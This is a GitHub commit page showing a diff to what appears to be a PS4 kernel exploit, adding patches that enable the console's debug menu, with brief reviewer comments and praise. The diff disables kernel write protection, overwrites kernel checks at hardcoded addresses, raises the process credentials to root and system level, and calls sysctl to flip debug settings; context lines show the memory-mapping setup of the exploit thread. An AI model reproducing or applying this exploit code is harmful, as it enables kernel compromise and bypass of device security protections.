Permalink
Browse files

Enable dev menu

Thanks, flatz :)
1 parent c8f27db commit 0028afaf0ef9b2581d47ec4d32ebb4c75db9d576 @CTurt CTurt committed Apr 27, 2016
Showing with 22 additions and 9 deletions.
  1. +22 −9 source/main.c
View
@@ -32,12 +32,17 @@ void payload(struct knote *kn) {
// Disable write protection
uint64_t cr0 = readCr0();
writeCr0(cr0 & ~X86_CR0_WP);
-
- // Patch functions here if required
-
+
+ // sysctl_machdep_rcmgr_debug_menu and sysctl_machdep_rcmgr_store_moe
+ *(uint16_t *)0xFFFFFFFF82607C46 = 0x9090;
@balika011
balika011 May 1, 2016 edited

Its just a bypass for word_FFFFFFFF833242F6 & 4 in FFFFFFFF826073B0

+ *(uint16_t *)0xFFFFFFFF82607826 = 0x9090;
@balika011
balika011 May 1, 2016 edited

its just a bypass for word_FFFFFFFF833242F6 & 0x10 in FFFFFFFF826077D0

+
+ *(char *)0xFFFFFFFF8332431A = 1;
@balika011
balika011 May 1, 2016

bIsAllowDebugSoftWagnerClock

+ *(char *)0xFFFFFFFF83324338 = 1;
@balika011
balika011 May 1, 2016

bIsAllowAdClock, bIsStoreMode, also used in FFFFFFFF826077D0

+
// Restore write protection
writeCr0(cr0);
-
+
// Resolve creds
cred = td->td_proc->p_ucred;
@@ -48,7 +53,7 @@ void payload(struct knote *kn) {
cred->cr_groups[0] = 0;
void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred
-
+
// sceSblACMgrIsSystemUcred
uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);
*sonyCred = 0xffffffffffffffff;
@@ -101,11 +106,8 @@ void *exploitThread(void *none) {
uint64_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
-
- // Ensure end of mapping is unmapped
munmap(mapping + mappingSize, PAGE_SIZE);
- // buffer + copySize points to unmapped memory
uint8_t *buffer = mapping + mappingSize - copySize;
int64_t count = (0x100000000 + bufferSize) / 4;
@@ -246,7 +248,18 @@ int _main(void) {
printfsocket("[+] Kernel patch success!\n");
- // Do any post-exploit stuff here
+ // Enable debug menu
+ int (*sysctlbyname)(const char *name, void *oldp, size_t *oldlenp, const void *newp, size_t newlen) = NULL;
+ RESOLVE(libKernelHandle, sysctlbyname);
+
+ uint32_t enable;
+ size_t size;
+
+ enable = 1;
+ size = sizeof(enable);
+
+ sysctlbyname("machdep.rcmgr_utoken_store_mode", NULL, NULL, &enable, size);
+ sysctlbyname("machdep.rcmgr_debug_menu", NULL, NULL, &enable, size);
#ifdef DEBUG_SOCKET
munmap(dump, PAGE_SIZE);

2 comments on commit 0028afa

@chronoss09

Good work, thanks ;)

@Anonymodmous

Very goof work

Please sign in to comment.